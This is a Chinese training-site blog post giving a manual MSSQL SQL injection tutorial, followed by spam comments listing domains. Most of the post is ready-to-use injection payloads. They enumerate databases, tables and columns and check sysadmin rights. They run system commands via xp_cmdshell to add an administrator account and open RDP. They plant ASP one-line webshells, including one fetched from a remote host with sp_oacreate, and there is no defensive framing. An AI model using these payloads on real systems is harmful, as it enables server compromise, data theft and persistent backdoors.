Mssql手工注入教程
  • 首页 > 网络安全培训
  • 作者:sunghost
  • 2016年2月16日 23:07 星期二
  • 浏览:2149 次
  • 字号:    
  • 评论:13 条
  • 字数:6737 个
  • 显示:1200px  1360px  1600px
  • 关灯  编辑
  • 时间:2016-2-16 23:07   浏览:2149  

    mssql端口1433
    1、判断是否有注入
    and 1=1
    and 1=2
    2、初步判断是否是mssql
    and user>0
    and exists (select * from sysobjects) //判断是否是MSSQL
    3、判断数据库系统
    and (select count(*) from sysobjects)>0 mssql
    and (select count(*) from msysobjects)>0 access
    and 1=(select @@version) 报版本信息
    and 1=(select @@VERSION) //MSSQL版本
    and 1=(select db_name()) 报数据库名
    and 1=(select @@servername) //本地服务名
    4、猜解表名
    and (select count(*) from [表名])>0
    and exists(select * from [表名]) //猜解表名
    5、猜解字段名
    and (select count([字段名]) from [表名])>0
    6、测试权限结构
    and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- //判断是否是系统管理员
    and 1=(select IS_SRVROLEMEMBER('db_owner'));-- //判断是否是库权限
    and 1=(select IS_SRVROLEMEMBER('pulic'));-- //判断是否是public权限
    and 1=(Select IS_MEMBER('db_owner'));-- //判断是否是库权限
    and 1= (Select HAS_DBACCESS('master'));-- //判断是否有库读取权限
    and 1=convert(int,db_name())或1=(select db_name()) //当前数据库名
    and 1=(select name from master.dbo.sysdatabases where dbid=1) //暴库名DBID为1,2,3....
    ;declare @d int //是否支持多行
    and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell') //判断XP_CMDSHELL是否存在
    and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread') //查看XP_regread扩展存储过程是不是已经被删除
    7、获取用户数据库
    and 1=(select top 1 name from master..sysdatabases where dbid>4) 获取第一个用户数据库
    and 1=(select top 1 name from master..sysdatabases where dbid>4 and name<>'数据库名') //获取第二个用户数据库
    and 1=(select top 1 name from master..sysdatabases where dbid>4 and name<>'数据库名' and name<>'数据库名') //获取第三个用户数据库
    8、获取表名
    and 1=(select top 1 name from sysobjects where xtype='u')//获取第一张表
    and 1=(select top 1 name from sysobjects where xtype='U' and name <> '[表名]')//获取第二张表
    9、获取列名
    and 1=(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'user'))//获取user表的列名
    and 1=(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'user')) and name <> 'uname' //获取user表的列名
    10、获取表数据
    and 1=(select top 1 [列名] from [表名])

    利用Mssql扩展存储注入攻击
    1.检测与恢复扩展存储 
    判断xp_cmdshell扩展存储是否存在 
    and 1=(select count(*) from master.dbo.sysobjects where xtype = 'x' AND name= 'xp_cmdshell')
     
    判断xp_regread扩展存储过程是否存在 
    and 1=(select count(*) from master.dbo.sysobjects where name='xp_regread')
     
    恢复 
    ;exec sp_dropextendedproc 'xp_cmdshell' 
    ;exec sp_dropextendedproc xp_cmdshell,'xplog70.dll'
     
    sa权限下扩展存储攻击利用方法 
    1.利用xp_cmdshell扩展执行任意命令 
    查看C盘 
    ;drop table black
    ;create TABLE black(mulu varchar(7996) NULL,ID int NOT NULL IDENTITY(1,1))-- 
    ;insert into black exec master..xp_cmdshell 'dir c:\' 
    and 1=(select top 1 mulu from black where id=1)
     
    新建用户 
    ;exec master..xp_cmdshell 'net user test test /add' 
    ;exec master..xp_cmdshell 'net localgroup administrators test /add'
     
    打开3389 
    ;exec master..xp_cmdshell 'sc config termservice start=auto' 
    ;exec master..xp_cmdshell 'net start termservice' 
    ;exec master..xp_cmdshell 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v www.sunghost.cn
     
    fDenyTSConnections /t REG_DWORD /d 0x0 /f'  //允许外部连接 
    ;exec master..xp_cmdshell 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
     
    Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x50 /f'    //改端口到80,个人感觉没什么用,要么放到最前面执行
     
    xp_regwrite操作注册表 
    ;exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\currentversion\run','black','REG_SZ','net
     
    user test test /add'
     
    开启沙盒模式 
    ;exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
     
    然后利用jet.oledb执行如下 
    ;select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\dnary.mdb','select shell("net user test test /add")')
     
    注意,如果注入点的参数是integer数字型,就可指定"ias.mdb"数据库;如果是string字符型,则可指定dnary.mdb。如果是windows 2000系统,数据库的路径应该指定为"x:\winnt\system32\ias\ias.mdb"。
     
    利用sp_makewebtask写入一句话木马
    ;exec sp_makewebtask 'e:\www_iis\yjh.asp','select''%3C%25%65%76%61%6C%20%72%65%71%75%65%73%74%28%22%63%68%6F%70%70%65%72%22%29%25%3E'''-- //e:\www_iis\yjh.asp路径;%3C%25%65%76%61%6C%20%72%65%71%75%65%73%74%28%22%63%68%6F%70%70%65%72%22%29%25%3E一句话木马

    利用sp_oacreate存储远程下载文件(啊D的一个漏洞利用工具就是这个原理)
    ;DECLARE @B varbinary(8000),@hr int,@http INT,@down INT 
    EXEC sp_oacreate [Microsoft.XMLHTTP],@http output  
    EXEC @hr = sp_oamethod @http,[Open],null,[GET],[http://www.test.com/muma.txt],0 
    EXEC @hr = sp_oamethod @http,[Send],null 
    EXEC @hr=sp_OAGetProperty @http,[responseBody],@B output 
    EXEC @hr=sp_oacreate [ADODB.Stream],@down output 
    EXEC @hr=sp_OASetProperty @down,[Type],1 EXEC @hr=sp_OASetProperty @down,[mode],3 
    EXEC @hr=sp_oamethod @down,[Open],null EXEC @hr=sp_oamethod @down,[Write],null,@B 
    EXEC @hr=sp_oamethod @down,[SaveToFile],null,[e:\www_iis\muma.asp],1
     
    即可下载文件:http://www.test.com/muma.txt的内容到e:\www_iis\muma.asp成功写入一个webshell.
     
    sp_addlogin扩展管理数据库用户 
    ;exec master.dbo.sp_addlogin test,password 
    exec master.dbo.sp_addlogin test,sysadmin
     
    xp_servicecontrol管理服务(自测不太管用) 
    要停掉或激活某个服务,可利用 
    ;exec master..xp_servicecontrol 'stop','schedule'   //停止计划任务服务 
    ;exec master..xp_servicecontrol 'start','schedule' 
    ;exec master..xp_servicecontrol 'start','server'    //启动server服务
     
    获取当前web目录 
    ;drop table black;create TABLE black(mulu varchar(7996) NULL,ID int NOT NULL IDENTITY(1,1))-- 
    ;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots','/',@result output insert into black (mulu) values(@result)--
     
    然后 
    and 1=(select top 1 mulu from black where id=1)
     
    dbowner权限下的扩展攻击利用 
    1.判断数据库用户权限 
    and 1=(select is_member('db_owner'));--
     
    2.搜索web目录 
    ;create table temp(dir nvarchar(255),depth varchar(255),files varchar(255),ID int NOT NULL IDENTITY(1,1));--
    然后 
    ;insert into temp(dir,depth,files)exec master.dbo.xp_dirtree 'c:',1,1--
    and(select dir from temp where id=1)>0
     
    由于不能一次性获取所有目录文件和文件夹名,因此需要更改ID的值,依次列出文件和文件夹
     
    3.写入一句话木马 
    找到web目录后,就可以写入一句话木马了 
    ;alter database news set RECOVERY FULL 
    ;create table test(str image)-- 
    ;backup log news to disk='c:\test' with init-- 或;backup database news to disk='c:\test' with init-- 
    ;insert into test(str)values ('<%excute(request("cmd"))%>')-- 
    ;backup log news to disk='c:\inetpub\wwwroot\yjh.asp'-- 或;backup database news to disk='c:\inetpub\wwwroot\yjh.asp'-- 
    ;alter database news RECOVERY simple
     您阅读这篇文章共花了: 
    二维码加载中...
    本文作者:sunghost      文章标题: Mssql手工注入教程
    本文地址:http://www.sunghost.cn/?post=154 本文已被百度收录
    版权声明:若无注明,本文皆为“㊙️网络安全培训_SEO优化培训_上科互联网络培训学院”原创,转载请保留文章出处。
      昵称   邮箱   主页
    V大  Google Chrome 50.0.2661.102 Windows 7 x64 Edition 湖北省武汉市 电信 2016-12-15 13:57
    1000bb.com yingshengxs.com
    bcw589.com bcw569.com pxswarov.com nydupiwu.com huaguikeji.com dzfzsx.com
    yzmm520.com weidouchuanbo.com gxy789.com shzcyb.com g428.com cqjzgg.com 021gjml.com
    jmtl88.com xgjinkou.com lydulougs.com qiejiaojiqi.com jidian7788.com cgxok.com
    ytdulougs.com portofiya.com greatboao.com 52kangdao.comboyu0611.com huihuiys.com 是
    aimin8.com vs8854.com szbaton.com jxcar168.com 7renjie.com 56menhu.com ishtml.com
    qp0576.cn bjtrhs.cn nbwanrui.cn 99tuomao.cn hoobay.cn dazhongbanwu.cn pa15.cn
    yjweimin.cn zhicjz.cn itgoo.cn gameease.cn xiaoming868.cn 9iiiii.cn wwdhtg.cn
    jztzoop.cn ecauzo.cn liyset.cn fjmtpxh.cn nayoumai.cn nc592.cn bowang123.cn
    zgfanyong.cn hongfei56.cn zhentan007.cn bxks8.cn 0598g.cn l11111.cn bjjy123.cn
    605604.cn rockbus.cn guwendong.cn 0731gj.cn
    止水带  Internet Explorer 11.0 Windows 7 河北省衡水市 电信 2016-09-15 03:07
    不错的文章,内容观念明确.禁止此消息:nolinkok@163.com
    支座更换  Internet Explorer 11.0 Windows 7 河北省衡水市 电信 2016-09-14 11:40
    好文章,内容惜墨如金.禁止此消息:nolinkok@163.com
    pvc护栏  Internet Explorer 11.0 Windows 7 河北省衡水市 电信 2016-09-09 02:30
    好文章,内容学富五车.禁止此消息:nolinkok@163.com
    边坡防护网  Internet Explorer 11.0 Windows 7 河北省衡水市 电信 2016-09-08 10:19
    不错的文章,内容横扫千军.禁止此消息:nolinkok@163.com
    工业明胶 河北省衡水市 电信 2016-08-18 05:22
    不错的文章,内容文从字顺.禁止此消息:nolinkok@163.com
    铁路声屏障 河北省衡水市 电信 2016-08-16 05:08
    好文章,内容气吞山河.禁止此消息:nolinkok@163.com
    硝基漆 河北省衡水市 电信 2016-08-14 18:10
    不错的文章,内容无懈可击.禁止此消息:nolinkok@163.com
    墨水网 河北省衡水市 电信 2016-08-08 07:10
    不错的文章!
    钢格板 河北省衡水市 电信 2016-08-01 14:24
    不错的文章,内容雷霆万钧.禁止此消息:nolinkok@163.com
    护栏网 河北省衡水市 电信 2016-07-30 19:54
    好文章,内容欢风华丽.禁止此消息:nolinkok@163.com
    勾花网 河北省衡水市 电信 2016-07-25 23:22
    好文章,内容远见卓识.禁止此消息:nolinkok@163.com
    压滤机 河北省衡水市 电信 2016-05-27 14:01
    不错的文章,内容栩栩如生.禁止此消息:nolinkok@163.com